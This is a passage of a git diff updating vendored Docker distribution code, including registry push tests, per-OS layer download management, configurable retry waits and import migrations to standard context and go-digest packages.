b/vendor/github.com/docker/docker/distribution/push_v2_test.go @@ -1,19 +1,23 @@ -package distribution +package distribution // import "github.com/docker/docker/distribution" import ( + "context" "net/http" + "net/url" "reflect" "testing" "github.com/docker/distribution" - "github.com/docker/distribution/context" - "github.com/docker/distribution/digest" "github.com/docker/distribution/manifest/schema2" - distreference "github.com/docker/distribution/reference" + "github.com/docker/distribution/reference" + "github.com/docker/distribution/registry/api/errcode" + "github.com/docker/docker/api/types" "github.com/docker/docker/distribution/metadata" "github.com/docker/docker/layer" "github.com/docker/docker/pkg/progress" - "github.com/docker/docker/reference" + refstore "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "github.com/opencontainers/go-digest" ) func TestGetRepositoryMountCandidates(t *testing.T) { @@ -43,8 +47,8 @@ func TestGetRepositoryMountCandidates(t *testing.T) { name: "one item matching", targetRepo: "busybox", maxCandidates: -1, - metadata: []metadata.V2Metadata{taggedMetadata("hash", "1", "hello-world")}, - candidates: []metadata.V2Metadata{taggedMetadata("hash", "1", "hello-world")}, + metadata: []metadata.V2Metadata{taggedMetadata("hash", "1", "docker.io/library/hello-world")}, + candidates: []metadata.V2Metadata{taggedMetadata("hash", "1", "docker.io/library/hello-world")}, }, { name: "allow missing SourceRepository", @@ -63,13 +67,13 @@ func TestGetRepositoryMountCandidates(t *testing.T) { maxCandidates: -1, metadata: []metadata.V2Metadata{ {Digest: digest.Digest("1"), SourceRepository: "docker.io/user/foo"}, - {Digest: digest.Digest("3"), SourceRepository: "user/bar"}, - {Digest: digest.Digest("2"), SourceRepository: "app"}, + {Digest: digest.Digest("3"), SourceRepository: "docker.io/user/bar"}, + {Digest: digest.Digest("2"), SourceRepository: "docker.io/library/app"}, }, candidates: []metadata.V2Metadata{ - 
{Digest: digest.Digest("3"), SourceRepository: "user/bar"}, + {Digest: digest.Digest("3"), SourceRepository: "docker.io/user/bar"}, {Digest: digest.Digest("1"), SourceRepository: "docker.io/user/foo"}, - {Digest: digest.Digest("2"), SourceRepository: "app"}, + {Digest: digest.Digest("2"), SourceRepository: "docker.io/library/app"}, }, }, { @@ -78,10 +82,10 @@ func TestGetRepositoryMountCandidates(t *testing.T) { targetRepo: "127.0.0.1/foo/bar", maxCandidates: -1, metadata: []metadata.V2Metadata{ - taggedMetadata("hash", "1", "hello-world"), + taggedMetadata("hash", "1", "docker.io/library/hello-world"), taggedMetadata("efgh", "2", "127.0.0.1/hello-world"), - taggedMetadata("abcd", "3", "busybox"), - taggedMetadata("hash", "4", "busybox"), + taggedMetadata("abcd", "3", "docker.io/library/busybox"), + taggedMetadata("hash", "4", "docker.io/library/busybox"), taggedMetadata("hash", "5", "127.0.0.1/foo"), taggedMetadata("hash", "6", "127.0.0.1/bar"), taggedMetadata("efgh", "7", "127.0.0.1/foo/bar"), @@ -105,23 +109,25 @@ func TestGetRepositoryMountCandidates(t *testing.T) { targetRepo: "user/app", maxCandidates: 3, metadata: []metadata.V2Metadata{ - taggedMetadata("abcd", "1", "user/app1"), - taggedMetadata("abcd", "2", "user/app/base"), - taggedMetadata("hash", "3", "user/app"), + taggedMetadata("abcd", "1", "docker.io/user/app1"), + taggedMetadata("abcd", "2", "docker.io/user/app/base"), + taggedMetadata("hash", "3", "docker.io/user/app"), taggedMetadata("abcd", "4", "127.0.0.1/user/app"), - taggedMetadata("hash", "5", "user/foo"), - taggedMetadata("hash", "6", "app/bar"), + taggedMetadata("hash", "5", "docker.io/user/foo"), + taggedMetadata("hash", "6", "docker.io/app/bar"), }, candidates: []metadata.V2Metadata{ // first by matching hash - taggedMetadata("abcd", "2", "user/app/base"), - taggedMetadata("abcd", "1", "user/app1"), + taggedMetadata("abcd", "2", "docker.io/user/app/base"), + taggedMetadata("abcd", "1", "docker.io/user/app1"), // then by longest matching 
prefix - taggedMetadata("hash", "3", "user/app"), + // "docker.io/usr/app" is excluded since candidates must + // be from a different repository + taggedMetadata("hash", "5", "docker.io/user/foo"), }, }, } { - repoInfo, err := reference.ParseNamed(tc.targetRepo) + repoInfo, err := reference.ParseNormalizedNamed(tc.targetRepo) if err != nil { t.Fatalf("[%s] failed to parse reference name: %v", tc.name, err) } @@ -184,7 +190,7 @@ func TestLayerAlreadyExists(t *testing.T) { expectedRequests: []string{"apple"}, }, { - name: "not matching reposies", + name: "not matching repositories", targetRepo: "busybox", maxExistenceChecks: 3, metadata: []metadata.V2Metadata{ @@ -202,12 +208,15 @@ func TestLayerAlreadyExists(t *testing.T) { checkOtherRepositories: true, metadata: []metadata.V2Metadata{ {Digest: digest.Digest("apple"), SourceRepository: "docker.io/library/hello-world"}, - {Digest: digest.Digest("orange"), SourceRepository: "docker.io/library/busybox/subapp"}, + {Digest: digest.Digest("orange"), SourceRepository: "docker.io/busybox/subapp"}, {Digest: digest.Digest("pear"), SourceRepository: "docker.io/busybox"}, - {Digest: digest.Digest("plum"), SourceRepository: "busybox"}, + {Digest: digest.Digest("plum"), SourceRepository: "docker.io/library/busybox"}, {Digest: digest.Digest("banana"), SourceRepository: "127.0.0.1/busybox"}, }, - expectedRequests: []string{"plum", "pear", "apple", "orange", "banana"}, + expectedRequests: []string{"plum", "apple", "pear", "orange", "banana"}, + expectedRemovals: []metadata.V2Metadata{ + {Digest: digest.Digest("plum"), SourceRepository: "docker.io/library/busybox"}, + }, }, { name: "find existing blob", @@ -374,7 +383,7 @@ func TestLayerAlreadyExists(t *testing.T) { }, }, } { - repoInfo, err := reference.ParseNamed(tc.targetRepo) + repoInfo, err := reference.ParseNormalizedNamed(tc.targetRepo) if err != nil { t.Fatalf("[%s] failed to parse reference name: %v", tc.name, err) } @@ -457,6 +466,158 @@ func TestLayerAlreadyExists(t 
*testing.T) { } } +type mockReferenceStore struct { +} + +func (s *mockReferenceStore) References(id digest.Digest) []reference.Named { + return []reference.Named{} +} +func (s *mockReferenceStore) ReferencesByName(ref reference.Named) []refstore.Association { + return []refstore.Association{} +} +func (s *mockReferenceStore) AddTag(ref reference.Named, id digest.Digest, force bool) error { + return nil +} +func (s *mockReferenceStore) AddDigest(ref reference.Canonical, id digest.Digest, force bool) error { + return nil +} +func (s *mockReferenceStore) Delete(ref reference.Named) (bool, error) { + return true, nil +} +func (s *mockReferenceStore) Get(ref reference.Named) (digest.Digest, error) { + return "", nil +} + +func TestWhenEmptyAuthConfig(t *testing.T) { + for _, authInfo := range []struct { + username string + password string + registryToken string + expected bool + }{ + { + username: "", + password: "", + registryToken: "", + expected: false, + }, + { + username: "username", + password: "password", + registryToken: "", + expected: true, + }, + { + username: "", + password: "", + registryToken: "token", + expected: true, + }, + } { + imagePushConfig := &ImagePushConfig{} + imagePushConfig.AuthConfig = &types.AuthConfig{ + Username: authInfo.username, + Password: authInfo.password, + RegistryToken: authInfo.registryToken, + } + imagePushConfig.ReferenceStore = &mockReferenceStore{} + repoInfo, _ := reference.ParseNormalizedNamed("xujihui1985/test.img") + pusher := &v2Pusher{ + config: imagePushConfig, + repoInfo: ®istry.RepositoryInfo{ + Name: repoInfo, + }, + endpoint: registry.APIEndpoint{ + URL: &url.URL{ + Scheme: "https", + Host: "index.docker.io", + }, + Version: registry.APIVersion1, + TrimHostname: true, + }, + } + pusher.Push(context.Background()) + if pusher.pushState.hasAuthInfo != authInfo.expected { + t.Errorf("hasAuthInfo does not match expected: %t != %t", authInfo.expected, pusher.pushState.hasAuthInfo) + } + } +} + +type 
mockBlobStoreWithCreate struct { + mockBlobStore + repo *mockRepoWithBlob +} + +func (blob *mockBlobStoreWithCreate) Create(ctx context.Context, options ...distribution.BlobCreateOption) (distribution.BlobWriter, error) { + return nil, errcode.Errors(append([]error{errcode.ErrorCodeUnauthorized.WithMessage("unauthorized")})) +} + +type mockRepoWithBlob struct { + mockRepo +} + +func (m *mockRepoWithBlob) Blobs(ctx context.Context) distribution.BlobStore { + blob := &mockBlobStoreWithCreate{} + blob.mockBlobStore.repo = &m.mockRepo + blob.repo = m + return blob +} + +type mockMetadataService struct { + mockV2MetadataService +} + +func (m *mockMetadataService) GetMetadata(diffID layer.DiffID) ([]metadata.V2Metadata, error) { + return []metadata.V2Metadata{ + taggedMetadata("abcd", "sha256:ff3a5c916c92643ff77519ffa742d3ec61b7f591b6b7504599d95a4a41134e28", "docker.io/user/app1"), + taggedMetadata("abcd", "sha256:ff3a5c916c92643ff77519ffa742d3ec61b7f591b6b7504599d95a4a41134e22", "docker.io/user/app/base"), + taggedMetadata("hash", "sha256:ff3a5c916c92643ff77519ffa742d3ec61b7f591b6b7504599d95a4a41134e23", "docker.io/user/app"), + taggedMetadata("abcd", "sha256:ff3a5c916c92643ff77519ffa742d3ec61b7f591b6b7504599d95a4a41134e24", "127.0.0.1/user/app"), + taggedMetadata("hash", "sha256:ff3a5c916c92643ff77519ffa742d3ec61b7f591b6b7504599d95a4a41134e25", "docker.io/user/foo"), + taggedMetadata("hash", "sha256:ff3a5c916c92643ff77519ffa742d3ec61b7f591b6b7504599d95a4a41134e26", "docker.io/app/bar"), + }, nil +} + +var removeMetadata bool + +func (m *mockMetadataService) Remove(metadata metadata.V2Metadata) error { + removeMetadata = true + return nil +} + +func TestPushRegistryWhenAuthInfoEmpty(t *testing.T) { + repoInfo, _ := reference.ParseNormalizedNamed("user/app") + ms := &mockMetadataService{} + remoteErrors := map[digest.Digest]error{digest.Digest("sha256:apple"): distribution.ErrAccessDenied} + remoteBlobs := 
map[digest.Digest]distribution.Descriptor{digest.Digest("sha256:apple"): {Digest: digest.Digest("shar256:apple")}} + repo := &mockRepoWithBlob{ + mockRepo: mockRepo{ + t: t, + errors: remoteErrors, + blobs: remoteBlobs, + requests: []string{}, + }, + } + pd := &v2PushDescriptor{ + hmacKey: []byte("abcd"), + repoInfo: repoInfo, + layer: &storeLayer{ + Layer: layer.EmptyLayer, + }, + repo: repo, + v2MetadataService: ms, + pushState: &pushState{ + remoteLayers: make(map[layer.DiffID]distribution.Descriptor), + hasAuthInfo: false, + }, + checkedDigests: make(map[digest.Digest]struct{}), + } + pd.Upload(context.Background(), &progressSink{t}) + if removeMetadata { + t.Fatalf("expect remove not be called but called") + } +} + func taggedMetadata(key string, dgst string, sourceRepo string) metadata.V2Metadata { meta := metadata.V2Metadata{ Digest: digest.Digest(dgst), @@ -476,7 +637,7 @@ type mockRepo struct { var _ distribution.Repository = &mockRepo{} -func (m *mockRepo) Named() distreference.Named { +func (m *mockRepo) Named() reference.Named { m.t.Fatalf("Named() not implemented") return nil } diff --git a/vendor/github.com/docker/docker/distribution/registry.go b/vendor/github.com/docker/docker/distribution/registry.go index 95e181ded8..8b46aaad6d 100644 --- a/vendor/github.com/docker/docker/distribution/registry.go +++ b/vendor/github.com/docker/docker/distribution/registry.go @@ -1,6 +1,7 @@ -package distribution +package distribution // import "github.com/docker/docker/distribution" import ( + "context" "fmt" "net" "net/http" @@ -8,7 +9,7 @@ import ( "github.com/docker/distribution" "github.com/docker/distribution/manifest/schema2" - distreference "github.com/docker/distribution/reference" + "github.com/docker/distribution/reference" "github.com/docker/distribution/registry/client" "github.com/docker/distribution/registry/client/auth" "github.com/docker/distribution/registry/client/transport" @@ -16,7 +17,6 @@ import ( "github.com/docker/docker/dockerversion" 
"github.com/docker/docker/registry" "github.com/docker/go-connections/sockets" - "golang.org/x/net/context" ) // ImageTypes represents the schema2 config types for images @@ -55,10 +55,10 @@ func init() { // providing timeout settings and authentication support, and also verifies the // remote API version. func NewV2Repository(ctx context.Context, repoInfo *registry.RepositoryInfo, endpoint registry.APIEndpoint, metaHeaders http.Header, authConfig *types.AuthConfig, actions ...string) (repo distribution.Repository, foundVersion bool, err error) { - repoName := repoInfo.FullName() + repoName := repoInfo.Name.Name() // If endpoint does not support CanonicalName, use the RemoteName instead if endpoint.TrimHostname { - repoName = repoInfo.RemoteName() + repoName = reference.Path(repoInfo.Name) } direct := &net.Dialer{ @@ -82,7 +82,7 @@ func NewV2Repository(ctx context.Context, repoInfo *registry.RepositoryInfo, end base.Dial = proxyDialer.Dial } - modifiers := registry.DockerHeaders(dockerversion.DockerUserAgent(ctx), metaHeaders) + modifiers := registry.Headers(dockerversion.DockerUserAgent(ctx), metaHeaders) authTransport := transport.NewTransport(base, modifiers...) challengeManager, foundVersion, err := registry.PingV2Registry(endpoint.URL, authTransport) @@ -122,7 +122,7 @@ func NewV2Repository(ctx context.Context, repoInfo *registry.RepositoryInfo, end } tr := transport.NewTransport(base, modifiers...) 
- repoNameRef, err := distreference.ParseNamed(repoName) + repoNameRef, err := reference.WithName(repoName) if err != nil { return nil, foundVersion, fallbackError{ err: err, @@ -131,7 +131,7 @@ func NewV2Repository(ctx context.Context, repoInfo *registry.RepositoryInfo, end } } - repo, err = client.NewRepository(ctx, repoNameRef, endpoint.URL.String(), tr) + repo, err = client.NewRepository(repoNameRef, endpoint.URL.String(), tr) if err != nil { err = fallbackError{ err: err, diff --git a/vendor/github.com/docker/docker/distribution/registry_unit_test.go b/vendor/github.com/docker/docker/distribution/registry_unit_test.go index 406de34915..5ae529d23d 100644 --- a/vendor/github.com/docker/docker/distribution/registry_unit_test.go +++ b/vendor/github.com/docker/docker/distribution/registry_unit_test.go @@ -1,20 +1,19 @@ -package distribution +package distribution // import "github.com/docker/docker/distribution" import ( + "context" "net/http" "net/http/httptest" "net/url" - "os" + "runtime" "strings" "testing" - "github.com/Sirupsen/logrus" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" registrytypes "github.com/docker/docker/api/types/registry" - "github.com/docker/docker/reference" "github.com/docker/docker/registry" - "github.com/docker/docker/utils" - "golang.org/x/net/context" + "github.com/sirupsen/logrus" ) const secretRegistryToken = "mysecrettoken" @@ -38,12 +37,6 @@ func (h *tokenPassThruHandler) ServeHTTP(w http.ResponseWriter, r *http.Request) } func testTokenPassThru(t *testing.T, ts *httptest.Server) { - tmp, err := utils.TestDirectory("") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmp) - uri, err := url.Parse(ts.URL) if err != nil { t.Fatalf("could not parse url from test server: %v", err) @@ -56,11 +49,10 @@ func testTokenPassThru(t *testing.T, ts *httptest.Server) { Official: false, TrimHostname: false, TLSConfig: nil, - //VersionHeader: "verheader", } - n, _ := 
reference.ParseNamed("testremotename") + n, _ := reference.ParseNormalizedNamed("testremotename") repoInfo := ®istry.RepositoryInfo{ - Named: n, + Name: n, Index: ®istrytypes.IndexInfo{ Name: "testrepo", Mirrors: nil, @@ -92,7 +84,7 @@ func testTokenPassThru(t *testing.T, ts *httptest.Server) { logrus.Debug("About to pull") // We expect it to fail, since we haven't mock'd the full registry exchange in our handler above tag, _ := reference.WithTag(n, "tag_goes_here") - _ = p.pullV2Repository(ctx, tag) + _ = p.pullV2Repository(ctx, tag, runtime.GOOS) } func TestTokenPassThru(t *testing.T) { diff --git a/vendor/github.com/docker/docker/distribution/utils/progress.go b/vendor/github.com/docker/docker/distribution/utils/progress.go index ef8ecc89f6..73ee2be61e 100644 --- a/vendor/github.com/docker/docker/distribution/utils/progress.go +++ b/vendor/github.com/docker/docker/distribution/utils/progress.go @@ -1,4 +1,4 @@ -package utils +package utils // import "github.com/docker/docker/distribution/utils" import ( "io" @@ -6,15 +6,15 @@ import ( "os" "syscall" - "github.com/Sirupsen/logrus" "github.com/docker/docker/pkg/progress" "github.com/docker/docker/pkg/streamformatter" + "github.com/sirupsen/logrus" ) // WriteDistributionProgress is a helper for writing progress from chan to JSON // stream with an optional cancel function. 
func WriteDistributionProgress(cancelFunc func(), outStream io.Writer, progressChan <-chan progress.Progress) { - progressOutput := streamformatter.NewJSONStreamFormatter().NewProgressOutput(outStream, false) + progressOutput := streamformatter.NewJSONProgressOutput(outStream, false) operationCancelled := false for prog := range progressChan { diff --git a/vendor/github.com/docker/docker/distribution/xfer/download.go b/vendor/github.com/docker/docker/distribution/xfer/download.go index 7545342212..e8cda93628 100644 --- a/vendor/github.com/docker/docker/distribution/xfer/download.go +++ b/vendor/github.com/docker/docker/distribution/xfer/download.go @@ -1,19 +1,21 @@ -package xfer +package xfer // import "github.com/docker/docker/distribution/xfer" import ( + "context" "errors" "fmt" "io" + "runtime" "time" - "github.com/Sirupsen/logrus" "github.com/docker/distribution" "github.com/docker/docker/image" "github.com/docker/docker/layer" "github.com/docker/docker/pkg/archive" "github.com/docker/docker/pkg/ioutils" "github.com/docker/docker/pkg/progress" - "golang.org/x/net/context" + "github.com/docker/docker/pkg/system" + "github.com/sirupsen/logrus" ) const maxDownloadAttempts = 5 @@ -22,21 +24,27 @@ const maxDownloadAttempts = 5 // registers and downloads those, taking into account dependencies between // layers. type LayerDownloadManager struct { - layerStore layer.Store - tm TransferManager + layerStores map[string]layer.Store + tm TransferManager + waitDuration time.Duration } -// SetConcurrency set the max concurrent downloads for each pull +// SetConcurrency sets the max concurrent downloads for each pull func (ldm *LayerDownloadManager) SetConcurrency(concurrency int) { ldm.tm.SetConcurrency(concurrency) } // NewLayerDownloadManager returns a new LayerDownloadManager. 
-func NewLayerDownloadManager(layerStore layer.Store, concurrencyLimit int) *LayerDownloadManager { - return &LayerDownloadManager{ - layerStore: layerStore, - tm: NewTransferManager(concurrencyLimit), +func NewLayerDownloadManager(layerStores map[string]layer.Store, concurrencyLimit int, options ...func(*LayerDownloadManager)) *LayerDownloadManager { + manager := LayerDownloadManager{ + layerStores: layerStores, + tm: NewTransferManager(concurrencyLimit), + waitDuration: time.Second, + } + for _, option := range options { + option(&manager) } + return &manager } type downloadTransfer struct { @@ -87,8 +95,8 @@ type DownloadDescriptorWithRegistered interface { // the layer store, and the key is not used by an in-progress download, the // Download method is called to get the layer tar data. Layers are then // registered in the appropriate order. The caller must call the returned -// release function once it is is done with the returned RootFS object. -func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS image.RootFS, layers []DownloadDescriptor, progressOutput progress.Output) (image.RootFS, func(), error) { +// release function once it is done with the returned RootFS object. +func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS image.RootFS, os string, layers []DownloadDescriptor, progressOutput progress.Output) (image.RootFS, func(), error) { var ( topLayer layer.Layer topDownload *downloadTransfer @@ -98,6 +106,15 @@ func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS ima downloadsByKey = make(map[string]*downloadTransfer) ) + // Assume that the operating system is the host OS if blank, and validate it + // to ensure we don't cause a panic by an invalid index into the layerstores. 
+ if os == "" { + os = runtime.GOOS + } + if !system.IsOSSupported(os) { + return image.RootFS{}, nil, system.ErrNotSupportedOperatingSystem + } + rootFS := initialRootFS for _, descriptor := range layers { key := descriptor.Key() @@ -109,17 +126,22 @@ func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS ima if err == nil { getRootFS := rootFS getRootFS.Append(diffID) - l, err := ldm.layerStore.Get(getRootFS.ChainID()) + l, err := ldm.layerStores[os].Get(getRootFS.ChainID()) if err == nil { // Layer already exists. logrus.Debugf("Layer already exists: %s", descriptor.ID()) progress.Update(progressOutput, descriptor.ID(), "Already exists") if topLayer != nil { - layer.ReleaseAndLog(ldm.layerStore, topLayer) + layer.ReleaseAndLog(ldm.layerStores[os], topLayer) } topLayer = l missingLayer = false rootFS.Append(diffID) + // Register this repository as a source of this layer. + withRegistered, hasRegistered := descriptor.(DownloadDescriptorWithRegistered) + if hasRegistered { // As layerstore may set the driver + withRegistered.Registered(diffID) + } continue } } @@ -129,7 +151,7 @@ func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS ima // the stack? If so, avoid downloading it more than once. 
var topDownloadUncasted Transfer if existingDownload, ok := downloadsByKey[key]; ok { - xferFunc := ldm.makeDownloadFuncFromDownload(descriptor, existingDownload, topDownload) + xferFunc := ldm.makeDownloadFuncFromDownload(descriptor, existingDownload, topDownload, os) defer topDownload.Transfer.Release(watcher) topDownloadUncasted, watcher = ldm.tm.Transfer(transferKey, xferFunc, progressOutput) topDownload = topDownloadUncasted.(*downloadTransfer) @@ -141,10 +163,10 @@ func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS ima var xferFunc DoFunc if topDownload != nil { - xferFunc = ldm.makeDownloadFunc(descriptor, "", topDownload) + xferFunc = ldm.makeDownloadFunc(descriptor, "", topDownload, os) defer topDownload.Transfer.Release(watcher) } else { - xferFunc = ldm.makeDownloadFunc(descriptor, rootFS.ChainID(), nil) + xferFunc = ldm.makeDownloadFunc(descriptor, rootFS.ChainID(), nil, os) } topDownloadUncasted, watcher = ldm.tm.Transfer(transferKey, xferFunc, progressOutput) topDownload = topDownloadUncasted.(*downloadTransfer) @@ -154,7 +176,7 @@ func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS ima if topDownload == nil { return rootFS, func() { if topLayer != nil { - layer.ReleaseAndLog(ldm.layerStore, topLayer) + layer.ReleaseAndLog(ldm.layerStores[os], topLayer) } }, nil } @@ -165,7 +187,7 @@ func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS ima defer func() { if topLayer != nil { - layer.ReleaseAndLog(ldm.layerStore, topLayer) + layer.ReleaseAndLog(ldm.layerStores[os], topLayer) } }() @@ -201,11 +223,11 @@ func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS ima // complete before the registration step, and registers the downloaded data // on top of parentDownload's resulting layer. Otherwise, it registers the // layer on top of the ChainID given by parentLayer. 
-func (ldm *LayerDownloadManager) makeDownloadFunc(descriptor DownloadDescriptor, parentLayer layer.ChainID, parentDownload *downloadTransfer) DoFunc { +func (ldm *LayerDownloadManager) makeDownloadFunc(descriptor DownloadDescriptor, parentLayer layer.ChainID, parentDownload *downloadTransfer, os string) DoFunc { return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer { d := &downloadTransfer{ Transfer: NewTransfer(), - layerStore: ldm.layerStore, + layerStore: ldm.layerStores[os], } go func() { @@ -269,7 +291,7 @@ func (ldm *LayerDownloadManager) makeDownloadFunc(descriptor DownloadDescriptor, logrus.Errorf("Download failed, retrying: %v", err) delay := retries * 5 - ticker := time.NewTicker(time.Second) + ticker := time.NewTicker(ldm.waitDuration) selectLoop: for { @@ -365,11 +387,11 @@ func (ldm *LayerDownloadManager) makeDownloadFunc(descriptor DownloadDescriptor, // parentDownload. This function does not log progress output because it would // interfere with the progress reporting for sourceDownload, which has the same // Key. 
-func (ldm *LayerDownloadManager) makeDownloadFuncFromDownload(descriptor DownloadDescriptor, sourceDownload *downloadTransfer, parentDownload *downloadTransfer) DoFunc { +func (ldm *LayerDownloadManager) makeDownloadFuncFromDownload(descriptor DownloadDescriptor, sourceDownload *downloadTransfer, parentDownload *downloadTransfer, os string) DoFunc { return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer { d := &downloadTransfer{ Transfer: NewTransfer(), - layerStore: ldm.layerStore, + layerStore: ldm.layerStores[os], } go func() { diff --git a/vendor/github.com/docker/docker/distribution/xfer/download_test.go b/vendor/github.com/docker/docker/distribution/xfer/download_test.go index bc20e1e7ec..4ab3705af6 100644 --- a/vendor/github.com/docker/docker/distribution/xfer/download_test.go +++ b/vendor/github.com/docker/docker/distribution/xfer/download_test.go @@ -1,7 +1,8 @@ -package xfer +package xfer // import "github.com/docker/docker/distribution/xfer" import ( "bytes" + "context" "errors" "fmt" "io" @@ -12,11 +13,10 @@ import ( "time" "github.com/docker/distribution" - "github.com/docker/distribution/digest" "github.com/docker/docker/image" "github.com/docker/docker/layer" "github.com/docker/docker/pkg/progress" - "golang.org/x/net/context" + "github.com/opencontainers/go-digest" ) const maxDownloadConcurrency = 3 @@ -26,6 +26,7 @@ type mockLayer struct { diffID layer.DiffID chainID layer.ChainID parent layer.Layer + os string } func (ml *mockLayer) TarStream() (io.ReadCloser, error) { @@ -126,7 +127,7 @@ func (ls *mockLayerStore) Get(chainID layer.ChainID) (layer.Layer, error) { func (ls *mockLayerStore) Release(l layer.Layer) ([]layer.Metadata, error) { return []layer.Metadata{}, nil } -func (ls *mockLayerStore) CreateRWLayer(string, layer.ChainID, string, layer.MountInit, map[string]string) (layer.RWLayer, error) { +func (ls *mockLayerStore) CreateRWLayer(string, layer.ChainID, *layer.CreateRWLayerOpts) 
(layer.RWLayer, error) { return nil, errors.New("not implemented") } @@ -265,8 +266,11 @@ func TestSuccessfulDownload(t *testing.T) { if runtime.GOOS == "windows" { t.Skip("Needs fixing on Windows") } + layerStore := &mockLayerStore{make(map[layer.ChainID]*mockLayer)} - ldm := NewLayerDownloadManager(layerStore, maxDownloadConcurrency) + lsMap := make(map[string]layer.Store) + lsMap[runtime.GOOS] = layerStore + ldm := NewLayerDownloadManager(lsMap, maxDownloadConcurrency, func(m *LayerDownloadManager) { m.waitDuration = time.Millisecond }) progressChan := make(chan progress.Progress) progressDone := make(chan struct{}) @@ -291,7 +295,7 @@ func TestSuccessfulDownload(t *testing.T) { } firstDescriptor.diffID = l.DiffID() - rootFS, releaseFunc, err := ldm.Download(context.Background(), *image.NewRootFS(), descriptors, progress.ChanOutput(progressChan)) + rootFS, releaseFunc, err := ldm.Download(context.Background(), *image.NewRootFS(), runtime.GOOS, descriptors, progress.ChanOutput(progressChan)) if err != nil { t.Fatalf("download error: %v", err) } @@ -327,8 +331,10 @@ func TestSuccessfulDownload(t *testing.T) { } func TestCancelledDownload(t *testing.T) { - ldm := NewLayerDownloadManager(&mockLayerStore{make(map[layer.ChainID]*mockLayer)}, maxDownloadConcurrency) - + layerStore := &mockLayerStore{make(map[layer.ChainID]*mockLayer)} + lsMap := make(map[string]layer.Store) + lsMap[runtime.GOOS] = layerStore + ldm := NewLayerDownloadManager(lsMap, maxDownloadConcurrency, func(m *LayerDownloadManager) { m.waitDuration = time.Millisecond }) progressChan := make(chan progress.Progress) progressDone := make(chan struct{}) @@ -346,7 +352,7 @@ func TestCancelledDownload(t *testing.T) { }() descriptors := downloadDescriptors(nil) - _, _, err := ldm.Download(ctx, *image.NewRootFS(), descriptors, progress.ChanOutput(progressChan)) + _, _, err := ldm.Download(ctx, *image.NewRootFS(), runtime.GOOS, descriptors, progress.ChanOutput(progressChan)) if err != context.Canceled { 
t.Fatal("expected download to be cancelled") } diff --git a/vendor/github.com/docker/docker/distribution/xfer/transfer.go b/vendor/github.com/docker/docker/distribution/xfer/transfer.go index 14f15660ac..c356fde8d3 100644 --- a/vendor/github.com/docker/docker/distribution/xfer/transfer.go +++ b/vendor/github.com/docker/docker/distribution/xfer/transfer.go @@ -1,11 +1,11 @@ -package xfer +package xfer // import "github.com/docker/docker/distribution/xfer" import ( + "context" "runtime" "sync" "github.com/docker/docker/pkg/progress" - "golang.org/x/net/context" ) // DoNotRetry is an error wrapper indicating that the error cannot be resolved @@ -300,7 +300,7 @@ func NewTransferManager(concurrencyLimit int) TransferManager { } } -// SetConcurrency set the concurrencyLimit +// SetConcurrency sets the concurrencyLimit func (tm *transferManager) SetConcurrency(concurrency int) { tm.mu.Lock() tm.concurrencyLimit = concurrency diff --git a/vendor/github.com/docker/docker/distribution/xfer/transfer_test.go b/vendor/github.com/docker/docker/distribution/xfer/transfer_test.go index 6c50ce3524..a86e27959e 100644 --- a/vendor/github.com/docker/docker/distribution/xfer/transfer_test.go +++ b/vendor/github.com/docker/docker/distribution/xfer/transfer_test.go @@ -1,4 +1,4 @@ -package xfer +package xfer // import "github.com/docker/docker/distribution/xfer" import ( "sync/atomic" diff --git a/vendor/github.com/docker/docker/distribution/xfer/upload.go b/vendor/github.com/docker/docker/distribution/xfer/upload.go index ad3398369c..33b45ad747 100644 --- a/vendor/github.com/docker/docker/distribution/xfer/upload.go +++ b/vendor/github.com/docker/docker/distribution/xfer/upload.go @@ -1,14 +1,14 @@ -package xfer +package xfer // import "github.com/docker/docker/distribution/xfer" import ( + "context" "errors" "time" - "github.com/Sirupsen/logrus" "github.com/docker/distribution" "github.com/docker/docker/layer" "github.com/docker/docker/pkg/progress" - "golang.org/x/net/context" + 
"github.com/sirupsen/logrus" ) const maxUploadAttempts = 5 @@ -16,19 +16,25 @@ const maxUploadAttempts = 5 // LayerUploadManager provides task management and progress reporting for // uploads. type LayerUploadManager struct { - tm TransferManager + tm TransferManager + waitDuration time.Duration } -// SetConcurrency set the max concurrent uploads for each push +// SetConcurrency sets the max concurrent uploads for each push func (lum *LayerUploadManager) SetConcurrency(concurrency int) { lum.tm.SetConcurrency(concurrency) } // NewLayerUploadManager returns a new LayerUploadManager. -func NewLayerUploadManager(concurrencyLimit int) *LayerUploadManager { - return &LayerUploadManager{ - tm: NewTransferManager(concurrencyLimit), +func NewLayerUploadManager(concurrencyLimit int, options ...func(*LayerUploadManager)) *LayerUploadManager { + manager := LayerUploadManager{ + tm: NewTransferManager(concurrencyLimit), + waitDuration: time.Second, } + for _, option := range options { + option(&manager) + } + return &manager } type uploadTransfer struct { @@ -142,7 +148,7 @@ func (lum *LayerUploadManager) makeUploadFunc(descriptor UploadDescriptor) DoFun logrus.Errorf("Upload failed, retrying: %v", err) delay := retries * 5 - ticker := time.NewTicker(time.Second) + ticker := time.NewTicker(lum.waitDuration) selectLoop: for { diff --git a/vendor/github.com/docker/docker/distribution/xfer/upload_test.go b/vendor/github.com/docker/docker/distribution/xfer/upload_test.go index 16bd187336..4507feac7b 100644 --- a/vendor/github.com/docker/docker/distribution/xfer/upload_test.go +++ b/vendor/github.com/docker/docker/distribution/xfer/upload_test.go @@ -1,6 +1,7 @@ -package xfer +package xfer // import "github.com/docker/docker/distribution/xfer" import ( + "context" "errors" "sync/atomic" "testing" @@ -9,7 +10,6 @@ import ( "github.com/docker/distribution" "github.com/docker/docker/layer" "github.com/docker/docker/pkg/progress" - "golang.org/x/net/context" ) const 
